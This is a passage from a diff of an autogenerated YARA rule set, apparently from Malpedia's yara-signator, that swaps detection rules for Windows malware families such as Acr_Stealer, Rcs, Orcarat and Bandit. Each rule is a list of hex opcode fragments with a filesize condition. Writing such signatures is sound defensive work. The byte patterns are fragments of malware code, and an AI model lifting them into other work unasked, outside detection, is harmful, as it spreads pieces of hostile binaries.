+		$sequence_5 = { 0fb605???????? 4188440f02 48635320 4c634324 48039590020000 4183c703 418bcf }
+		$sequence_6 = { 4889742418 57 4881ece0010000 488b05???????? 4833c4 48898424d0010000 488b7908 }
+		$sequence_7 = { 8bd8 85c0 0f85d3000000 4885f6 7416 488bce e8???????? }
+		$sequence_8 = { 0fb78b94030000 0fb7937e020000 410fb7c0 450fb7c8 c1e904 83e101 66c1e80a }
+		$sequence_9 = { 410fb6cb e8???????? 85c0 7547 448d4005 0fb6d3 410fb6cb }
 
 	condition:
-		7 of them and filesize < 222784
+		7 of them and filesize < 1400832
 }
-rule MALPEDIA_Win_Defray_Auto : FILE
+rule MALPEDIA_Win_Splitloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c67cc17c-f08c-53a6-ada6-8bb99660ec4c"
+		id = "1a1cb38c-8464-5fc4-a742-33ff9af7dc5d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.defray_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.splitloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.splitloader_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "e0802b8bc0edda2578b1a81d41f729faf3574dbf8b45d2b645404d3734d8c95f"
+		logic_hash = "16d8d2ed74e30686bcfb5a681aebf6245d42317682bf1d1bc1fbb6f6c4392dc3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132966,32 +132735,32 @@ rule MALPEDIA_Win_Defray_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b86effffff 5e 8be5 5d c3 8d4102 8906 }
-		$sequence_1 = { 8be5 5d c3 8b4d08 8d041e 5f 5e }
-		$sequence_2 = { 0f84cf020000 83f8ff 0f84c6020000 6880000000 ffd6 50 }
-		$sequence_3 = { 83c40c 83601000 8b4df0 68???????? 8d4918 e8???????? 8d45ec }
-		$sequence_4 = { e8???????? f6450801 59 740d 68b8000000 56 }
-		$sequence_5 = { 66a5 8dbdbefcffff be???????? ab ab ab ab }
-		$sequence_6 = { 33c0 663b88f0724700 740d 83c002 83f814 72ef 33c0 }
-		$sequence_7 = { 33ff 393d???????? 7e79 33db 6800001000 e8???????? 8bf0 }
-		$sequence_8 = { a5 a5 66a5 8dbdbef6ffff be???????? ab ab }
-		$sequence_9 = { 0fb7c7 894de8 884dd8 8d4dd8 6a08 8945d4 c745ec0f000000 }
+		$sequence_0 = { c6817401000043 c681f701000043 488d0524910000 488981b8000000 b90d000000 e8???????? }
+		$sequence_1 = { 8bca 418984240cab0000 48014d10 85c0 790a b8fdffffff }
+		$sequence_2 = { 8b430c 8905???????? 8bd7 4c8d05f073ffff 89542420 83fa05 }
+		$sequence_3 = { 488bcf 4889742420 ff15???????? 4533c9 }
+		$sequence_4 = { 488be9 41be08000000 4d85e4 750e 418d46f6 4883c460 415e }
+		$sequence_5 = { 48897c2418 4154 4883ec20 4c8d25fc970000 33f6 }
+		$sequence_6 = { 750e 0f1f4000 4883c702 6644391f 74f6 }
+		$sequence_7 = { 8905???????? 8b430c 8905???????? 8bd7 4c8d05f073ffff 89542420 }
+		$sequence_8 = { eb9a 488d15df660000 488d0dc0660000 e8???????? 488d15dc660000 }
+		$sequence_9 = { 6644391f 750e 0f1f4000 4883c702 }
 
 	condition:
-		7 of them and filesize < 1253376
+		7 of them and filesize < 174080
 }
-rule MALPEDIA_Win_Deadwood_Auto : FILE
+rule MALPEDIA_Win_Rcs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b63793f4-2418-5ad7-9269-78c13c5e655b"
+		id = "88c200d0-341d-5e6f-ae92-f6d74505595f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deadwood_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rcs_auto.yar#L1-L178"
 		license_url = "N/A"
-		logic_hash = "37c079b3ff282377b03776f4a709dbdd660de9909aaf5ffcbe15f9216992b56f"
+		logic_hash = "3382bc9aa5e79b7f4a031deda04f3ba8bd2d1a1f1a24d3ec268d1e68154c00c2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133005,32 +132774,40 @@ rule MALPEDIA_Win_Deadwood_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b9???????? c645fcc6 e8???????? 68???????? b9???????? c645fcc7 }
-		$sequence_1 = { 68f0d8ffff 57 56 e8???????? 89442428 8954242c }
-		$sequence_2 = { e8???????? 33c0 e9???????? 8975e4 33c0 39b8a0e34600 0f8491000000 }
-		$sequence_3 = { c1f803 57 83f828 0f8e27010000 40 99 83e207 }
-		$sequence_4 = { 895e14 385d0c 7409 c745e858f54500 eb06 8b4008 8945e8 }
-		$sequence_5 = { 52 c745fc04000000 e8???????? 8d4dd0 8d851cffffff e8???????? }
-		$sequence_6 = { 57 897dfc 57 c745c801000000 ff15???????? 8bf8 897dd0 }
-		$sequence_7 = { 57 33db 6807020000 8d85f5fdffff 53 50 8bf1 }
-		$sequence_8 = { 8bc2 c1e81f 03c2 03f8 83c40c 897d14 85f6 }
-		$sequence_9 = { ffd5 8b4c241c 64890d00000000 59 5f 5e 5d }
+		$sequence_0 = { e8???????? 83c430 6aff 68???????? }
+		$sequence_1 = { 89442456 8944245a 8944245e 89442462 89442466 8944246a }
+		$sequence_2 = { ff15???????? 5f 5e 5d 5b 33c0 }
+		$sequence_3 = { 85ff 0f84d4000000 57 e8???????? }
+		$sequence_4 = { 40 68???????? 50 e8???????? 83c40c eb0d }
+		$sequence_5 = { 6a00 6880000000 6a01 6a00 6a05 }
+		$sequence_6 = { 83fd03 7c89 8b7c243c 33ed }
+		$sequence_7 = { 6a20 6a01 6a0a 6a11 ff5660 8bbedc000000 }
+		$sequence_8 = { 8bbedc000000 8bbf14120000 89da 81e2ffff0000 c1e204 }
+		$sequence_9 = { 89473c 8b7d08 8b37 81c6a1010000 }
+		$sequence_10 = { e8???????? 83c41c 8d4d80 83c8ff }
+		$sequence_11 = { c9 c3 55 89e5 81ec04020000 }
+		$sequence_12 = { 81f2be387d15 e9???????? 8be5 c1cead }
+		$sequence_13 = { 83fd02 7c2d 8b07 8d54300c 3b11 7350 03c6 }
+		$sequence_14 = { 898528f4fbff 8b86dc000000 833800 0f94c0 83e001 }
+		$sequence_15 = { 81f2d141ed35 f8 f5 d1ca }
+		$sequence_16 = { 817deca4000000 72c2 56 e8???????? }
+		$sequence_17 = { ffb56cf4fbff ffb584f4fbff ffb5a0f9fbff 8b86dc000000 8b5020 03905c020000 52 }
 
 	condition:
-		7 of them and filesize < 1055744
+		7 of them and filesize < 11501568
 }
-rule MALPEDIA_Win_Acr_Stealer_Auto : FILE
+rule MALPEDIA_Win_Tinyfluff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "547d8bdd-72e9-53c8-a71c-7409f9635ddc"
+		id = "261677c7-52da-544b-abba-e2c9762083b2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acr_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.acr_stealer_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyfluff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinyfluff_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "c2e01cdbfe17e3a90e2e6ed950f1a1b39c17c8ce5a68e48be7cf324c1277f6cb"
+		logic_hash = "305926cc2d71188dd193eb77d1fd5b2696d785cc7114678a3a44727f806b5473"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133044,32 +132821,32 @@ rule MALPEDIA_Win_Acr_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7008 8bce 6a00 ff15???????? 8bcf ffd6 5f }
-		$sequence_1 = { 6a0b 68???????? eb07 6a04 68???????? 8b3f 8b07 }
-		$sequence_2 = { 72fa 53 ff30 8b45f8 ff37 8b7030 }
-		$sequence_3 = { e8???????? 8bf2 33c9 c1ee0f 33f0 33ca }
-		$sequence_4 = { 8955f4 ff7407f8 e8???????? 8bfe 8955f0 83c410 }
-		$sequence_5 = { ff7034 ff15???????? ffd6 83c410 85c0 0f8490000000 8b4ddc }
-		$sequence_6 = { 894e44 83f908 73da 8b95b4feffff 3bd7 0f821affffff 8b4dfc }
-		$sequence_7 = { 397df4 7508 3bc1 0f8411ffffff 85c9 7403 49 }
-		$sequence_8 = { 8955f4 85c0 7406 c70000000000 85db 0f8420010000 33c0 }
-		$sequence_9 = { 85db 7469 83fb03 7329 66019e12860000 0f1f440000 8bc7 }
+		$sequence_0 = { 51 50 51 ffb5dcfbffff 8d8d74fbffff e8???????? 8d8590fbffff }
+		$sequence_1 = { 85c0 7418 8b858cfbffff 85c0 7407 50 }
+		$sequence_2 = { 8b0c8550704100 8a043b 03ce 8b75dc }
+		$sequence_3 = { eb6f 8b07 8d1c85446d4100 8b33 85f6 }
+		$sequence_4 = { e8???????? be01000000 8b95d8fbffff 83fa08 7235 }
+		$sequence_5 = { c7404860604100 8b4508 6689486c 8b4508 66898872010000 8d4dff 8b4508 }
+		$sequence_6 = { c7404860604100 8b4508 6689486c 8b4508 66898872010000 }
+		$sequence_7 = { 33c0 c744246000000000 c744246407000000 6689442450 }
+		$sequence_8 = { 8d85a8fbffff 6a01 0f4385a8fbffff 68???????? }
+		$sequence_9 = { c1fa06 8934b8 8bc7 83e03f 6bc838 8b049550704100 8b440818 }
 
 	condition:
-		7 of them and filesize < 1246208
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Keyhole_Auto : FILE
+rule MALPEDIA_Win_Unidentified_087_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1424dce1-e15d-5891-8b31-d03e6f9196b6"
+		id = "6032a71d-315e-5161-8b29-e52778de6b9c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyhole"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.keyhole_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_087"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_087_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "5d8e02829700ab11940f33d62fd46ba422e843d7ddb0ea7b421b42e641a7096f"
+		logic_hash = "6f89e449c7df0d973fa61becfc3b5884b82be1e57577d3cbd257d75e0b80e7b8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133083,32 +132860,38 @@ rule MALPEDIA_Win_Keyhole_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d442404 0f11442404 50 0f11442418 c744240830000000 c744241090f36800 c744241c00000000 }
-		$sequence_1 = { 2bee 90 8a01 8d4901 884429ff 83ef01 75f2 }
-		$sequence_2 = { 6a00 ff15???????? 8bd8 85ff 7515 8b0d???????? 81c15d010000 }
-		$sequence_3 = { 47 83c414 83c614 3bf8 72da a1???????? 33ff }
-		$sequence_4 = { 83ec08 53 8b5c2418 8bc3 d1e8 56 8d3440 }
-		$sequence_5 = { c3 a900080000 7404 33c0 eb11 56 53 }
-		$sequence_6 = { 7507 b9f5060000 eb1a 83f920 7205 83f97e 761e }
-		$sequence_7 = { 85c0 741f 53 e8???????? 83c404 85c0 }
-		$sequence_8 = { 3bf7 725d 8b7c2420 8bc2 25ff030000 0fbf844560010000 89442410 }
-		$sequence_9 = { 8d442420 50 55 6a00 ff15???????? 8b442428 8b542420 }
+		$sequence_0 = { 498bdd 666666666666660f1f840000000000 0fb6941c98000000 498bcf e8???????? }
+		$sequence_1 = { 41b900000008 4533c0 488d5560 33c9 ff15???????? 488bf8 4885c0 }
+		$sequence_2 = { c7457001000000 c7457c02000000 488d4580 4889442428 488d85a8000000 }
+		$sequence_3 = { 4885c9 7407 ff15???????? 90 4885db }
+		$sequence_4 = { 488d0c38 4d8bc7 4903cc 4803d5 e8???????? }
+		$sequence_5 = { 4883794800 7503 83ca04 4533c0 e8???????? 488b442450 }
+		$sequence_6 = { 4883fb01 0f8288000000 488d2d0e9a0200 48833d????????10 480f432d???????? }
+		$sequence_7 = { 488d5c3bff 498d7b01 4c8bc3 8bd5 }
+		$sequence_8 = { 50 56 68???????? 57 ff15???????? 3b442410 7414 }
+		$sequence_9 = { c78550fbffff94000000 8d8d50fbffff 51 ff15???????? }
+		$sequence_10 = { 3c58 770f 0fbec2 0fbe80c8b10110 }
+		$sequence_11 = { 7429 8b5508 39542410 7412 8d442408 50 }
+		$sequence_12 = { 52 ff15???????? 32c0 e9???????? 8d8550ffffff }
+		$sequence_13 = { 57 52 53 50 ff15???????? 8b8c242c040000 }
+		$sequence_14 = { e8???????? 8bdc 57 68???????? 8d4e01 e8???????? }
+		$sequence_15 = { 0f840c010000 8b0d???????? 8b7c2458 8d44240c }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 462848
 }
-rule MALPEDIA_Win_Newsreels_Auto : FILE
+rule MALPEDIA_Win_Bandit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9b53256-b535-5dc7-8672-9faed5bf005d"
+		id = "baac7fff-4fa3-5458-b9c3-9ba2ff3fe15a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.newsreels_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bandit_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a1151606e01c8e298edbe7dd1574962a9c78cdce343ec52b131b424fbeb15649"
+		logic_hash = "57d98c9e72ec66c58eb155bb6176131c752f20871acb7c0dc2253a7bf7e472fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133122,32 +132905,32 @@ rule MALPEDIA_Win_Newsreels_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1e902 f3a5 a1???????? 8bcd 83e103 }
-		$sequence_1 = { 83c41c 85f6 750b 5f }
-		$sequence_2 = { ff15???????? 8b8c241c030000 8dbc240c010000 51 83c9ff 33c0 }
-		$sequence_3 = { 56 ff15???????? 8be8 85ed 750e 56 }
-		$sequence_4 = { 83c410 c6043000 5e 5d 5b 81c4a0010000 }
-		$sequence_5 = { 83c408 85db 750a 5e 5d }
-		$sequence_6 = { 83c703 c1f902 83e13f 897c2424 8a81305d4000 88441efc 8a4c2ffd }
-		$sequence_7 = { 80e301 881c30 40 83f808 }
-		$sequence_8 = { 7415 53 e8???????? 83c404 33c0 }
-		$sequence_9 = { f7d1 2bf9 6a4d 8bf7 8bd9 8bfa 83c9ff }
+		$sequence_0 = { eb24 31c0 488d5c241f b931000000 0f1f00 e8???????? 488bac2498000000 }
+		$sequence_1 = { eb1e 440fb64c341a 4183c1c3 4401ca 88543c1a 448844341a 4883c002 }
+		$sequence_2 = { 8854245f 0fb6542424 0fb6742421 29f2 88542460 31c0 488d5c2446 }
+		$sequence_3 = { eb1c 4889c7 488b8c2400110000 e8???????? 488d3d6bac7c00 e8???????? e8???????? }
+		$sequence_4 = { e8???????? 90 31c9 e8???????? 4885ff 750a 48895c2440 }
+		$sequence_5 = { eb1d 488d7808 488b9424501b0000 e8???????? 488d3dc0945f00 e8???????? 90 }
+		$sequence_6 = { e8???????? 488b8424c8000000 488b542430 488b7058 4885f6 7429 4889742448 }
+		$sequence_7 = { eb15 488d05172b4e00 e8???????? 488b4c2440 48ff4158 c60002 4889c3 }
+		$sequence_8 = { eb1a 440fb64c342a 4183c14d 4401ca 88543c2a 448844342a 4883c002 }
+		$sequence_9 = { e8???????? 833d????????00 750e 488b8c24e8060000 48894818 eb15 488d7818 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 29914112
 }
-rule MALPEDIA_Win_Ironwind_Auto : FILE
+rule MALPEDIA_Win_Unidentified_013_Korean_Malware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b99e462-a945-5218-9501-2580c05d4989"
+		id = "d60dc930-c78c-5d42-af04-60f16f7605c1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironwind"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ironwind_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_013_korean_malware_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "29c70d85a1620a72f758c4af21c3937f3b52ad156ab8f42df1f1abd2148e1f61"
+		logic_hash = "9a5847dac5275d9c2120b30f47a61dd30ccc7df5d5dee4cad62b8a046a1148d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133161,32 +132944,32 @@ rule MALPEDIA_Win_Ironwind_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bd3 488bc8 ff15???????? 83f801 0f850b010000 4c3bfb 751e }
-		$sequence_1 = { 0f848b000000 488b4dc8 ff15???????? 488b55e8 488d0d988e0400 e8???????? 488945c8 }
-		$sequence_2 = { e9???????? f60603 0f95c0 88878a050000 488b4f18 }
-		$sequence_3 = { 7425 418bc8 488d15f9db0200 90 410fb60409 48ffc1 3a440aff }
-		$sequence_4 = { 83fa01 752d 488d0d109c0600 e8???????? 488bc8 ff15???????? }
-		$sequence_5 = { 0f84aa030000 b001 88476c 48c70700000000 41807c246c00 743d 488bce }
-		$sequence_6 = { 4c896b18 33ff 0fb6ac2490000000 418b87b4060000 488b4b10 448bc0 483bc8 }
-		$sequence_7 = { 4c8d4e38 8bca 4533c0 e8???????? 85c0 0f89c9000000 48c74638ffffffff }
-		$sequence_8 = { 4c896c2438 4c897c2430 e8???????? 4c8be8 4885c0 0f84e0020000 488bd0 }
-		$sequence_9 = { 807f5100 740e 80bc248000000000 0f846a020000 488b4f28 4885c9 743d }
+		$sequence_0 = { 6888130000 4f ffd6 e8???????? 85c0 74eb bfb4000000 }
+		$sequence_1 = { eb20 8d4604 c60000 eb18 8bc2 c604083f 897e14 }
+		$sequence_2 = { e8???????? 8d842454030000 50 83ec1c 8bcc 899c2480060000 }
+		$sequence_3 = { 837c242401 0f85be000000 0fb6542e04 3bd1 7412 }
+		$sequence_4 = { e8???????? 83c404 837c243410 7221 8b442420 }
+		$sequence_5 = { 8b4c2410 51 57 50 8944243c ff15???????? 8bf0 }
+		$sequence_6 = { e8???????? 81c41c010000 c3 55 6a00 6a00 }
+		$sequence_7 = { 50 8d842458060000 64a300000000 68???????? 68???????? 68???????? }
+		$sequence_8 = { 8b842420010000 53 56 57 }
+		$sequence_9 = { 395c2440 7304 8d44242c 8a1c38 0fb6cb }
 
 	condition:
-		7 of them and filesize < 995328
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Unidentified_020_Cia_Vault7_Auto : FILE
+rule MALPEDIA_Win_Orcarat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "50fc15f3-1120-5098-a2b0-ef6606f64bfb"
+		id = "f18bd4e3-b820-5b26-a4b2-4899e6f773ec"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_020_cia_vault7_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.orcarat_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "17fe086c6d5f4507ec1675a18ca14445f60cf526d184ed9a8460c468298fa68d"
+		logic_hash = "267a82fd5372f110668cffe923381f6f74a52ece9ba8a9c79d169c7d32552337"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133200,32 +132983,32 @@ rule MALPEDIA_Win_Unidentified_020_Cia_Vault7_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8d45f0 64a300000000 8965e8 8b7d08 c745fc00000000 8b07 }
-		$sequence_1 = { a1???????? 33c4 89842428080000 8b4508 53 }
-		$sequence_2 = { 52 8d85c6f7ffff 50 e8???????? 8bbdb8f7ffff }
-		$sequence_3 = { 33c0 8d8decfdffff 51 8d95c8fdffff 52 8985ccfdffff }
-		$sequence_4 = { 50 ff15???????? 85c0 7516 56 8945f8 }
-		$sequence_5 = { 68???????? 57 ff15???????? 8bd8 3bdf 742e 53 }
-		$sequence_6 = { 8907 897704 8b8dbcf7ffff 890f 50 }
-		$sequence_7 = { 837e1400 750f 6a7f ff15???????? 33c0 5e 8be5 }
-		$sequence_8 = { 68???????? 33f6 68???????? 56 8975fc c745f801000000 ff15???????? }
-		$sequence_9 = { 6aff 51 8b4d0c 6804010000 51 e8???????? 83c410 }
+		$sequence_0 = { 8a0d???????? 8a15???????? 346f 80f170 8844245e a1???????? 884c245c }
+		$sequence_1 = { 85c0 755a 57 8dbbb0010000 83c9ff 8d9534020000 }
+		$sequence_2 = { 51 68???????? 53 56 ffd5 85c0 }
+		$sequence_3 = { 8bcd 6a00 e8???????? 85c0 7507 5f }
+		$sequence_4 = { c21000 8d442420 6a00 8d4c2418 50 51 }
+		$sequence_5 = { 6a01 8bcd c7432801000000 896c241c e8???????? }
+		$sequence_6 = { 8b942408080000 56 8bf1 57 8bfa 83c9ff 33c0 }
+		$sequence_7 = { 5e 81c404080000 c20400 8d54240e 8bce 52 }
+		$sequence_8 = { f3a5 8bc8 83e103 f3a4 8d4c241c 51 e8???????? }
+		$sequence_9 = { 0f84d1000000 80bc241c0400003f 0f8488000000 8bc3 8d94241c040000 2bc2 8dbc241c040000 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Unidentified_031_Auto : FILE
+rule MALPEDIA_Win_Railsetter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a627a0b9-017e-5461-a9b3-c89e0fe42650"
+		id = "40a35231-bcd6-50b5-8c16-f4224571abb5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_031_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.railsetter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.railsetter_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "005409f0a75d0a6c7e76852a5fa0d497560f223da31bb6e0d79d2b1a3b3dfeb4"
+		logic_hash = "1c0f0eee020c15b328d39cbed0a5c62b2c564fd1a70af2c0c1b9fc2367e71a1f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133239,32 +133022,32 @@ rule MALPEDIA_Win_Unidentified_031_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 897de8 89bd40ffffff e9???????? 817d8004000400 754f }
-		$sequence_1 = { 3935???????? 7510 68???????? 68???????? ff15???????? 8b35???????? 8d9544ffffff }
-		$sequence_2 = { 83bd78ffffff03 0f82e5feffff 33c0 8b4dfc 5f 5e 5b }
-		$sequence_3 = { 51 52 6a12 ff15???????? 83c44c 8d4da0 ff15???????? }
-		$sequence_4 = { 898bb8200000 898bbc200000 57 8d83b81e0000 50 ffd6 6810140001 }
-		$sequence_5 = { 3d05000780 0f858c000000 837d2001 0f85e3000000 8d4de4 e8???????? 85c0 }
-		$sequence_6 = { e8???????? 8bf8 897dd4 85ff 747f 6a00 53 }
-		$sequence_7 = { 64a100000000 50 64892500000000 81ec04030000 53 56 57 }
-		$sequence_8 = { eb03 33f6 46 ff75c0 ff15???????? 59 8bc6 }
-		$sequence_9 = { 33c0 e9???????? 53 56 ff7508 8d85ecfdffff 50 }
+		$sequence_0 = { 488d4d20 ff15???????? 90 488d8dd0010000 e9???????? }
+		$sequence_1 = { 488d0ddc760400 eb07 488d0deb760400 ba11000000 }
+		$sequence_2 = { 488d8d10010000 ff15???????? 85c0 741a ff15???????? 8bc8 2b8d14010000 }
+		$sequence_3 = { 428a8c09687e0400 482bd0 8b42fc d3e8 49895008 41894018 0fb60a }
+		$sequence_4 = { 488d0d36a00500 e8???????? 488bc8 0fb754246e e8???????? 488bc8 e8???????? }
+		$sequence_5 = { 448d4205 488d0d4dae0400 e8???????? 0f57c0 0f1185c8000000 498bcc 49837c241810 }
+		$sequence_6 = { 488d05c3ef0200 488903 eb02 33db 48891f }
+		$sequence_7 = { 488d0d00690400 e8???????? ba19000000 448bca 448d4205 488d0d18640400 }
+		$sequence_8 = { 483bc1 0f8291010000 4c8d4d0f 48837d2710 4c0f434d0f }
+		$sequence_9 = { 48894a10 880a 488d153f360500 448d4115 488bcb e8???????? 488bc3 }
 
 	condition:
-		7 of them and filesize < 1998848
+		7 of them and filesize < 866304
 }
-rule MALPEDIA_Win_Stormwind_Auto : FILE
+rule MALPEDIA_Win_Flagpro_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5af12011-3b11-5340-9f55-c2d59a09e295"
+		id = "df493d50-e377-536e-a031-d239af918cf3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stormwind"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stormwind_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flagpro_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "0edc5101ea908b3c6d0ede012ca9b7d0ba4e1d8697013b724d36791523c87635"
+		logic_hash = "8734d591635985c73e20c9ca4d9912448a0aab9867cea544ed16d714554a9f18"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133278,32 +133061,32 @@ rule MALPEDIA_Win_Stormwind_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb87 85db 7483 8b7d08 8d7308 }
-		$sequence_1 = { 83663800 83630800 e8???????? e8???????? c3 833d????????00 746e }
-		$sequence_2 = { eb5c 8b45f4 8b0c85d8310510 f644190448 7437 8a06 }
-		$sequence_3 = { 8908 8d5602 8d4d0c e8???????? 8d4df0 83c404 }
-		$sequence_4 = { 8b06 83c41c 8bc8 8d7901 }
-		$sequence_5 = { e9???????? c745dca43e0410 8b4508 8b7510 dd00 dc4df8 }
-		$sequence_6 = { 8b7510 85f6 0f847f010000 8b5e14 85db 0f8874010000 }
-		$sequence_7 = { 53 e8???????? 8bf0 83c404 8975e8 6a00 6a00 }
-		$sequence_8 = { 751b 8b450c 891f 8918 8bc7 8b4df4 }
-		$sequence_9 = { 8bf8 59 83ffff 7407 8b34bd286c0410 56 e8???????? }
+		$sequence_0 = { 8d4501 50 e8???????? 8bf8 83c420 }
+		$sequence_1 = { 8b03 eb02 8bc3 55 8d2c3f }
+		$sequence_2 = { ffd5 68???????? e8???????? 8b44241c }
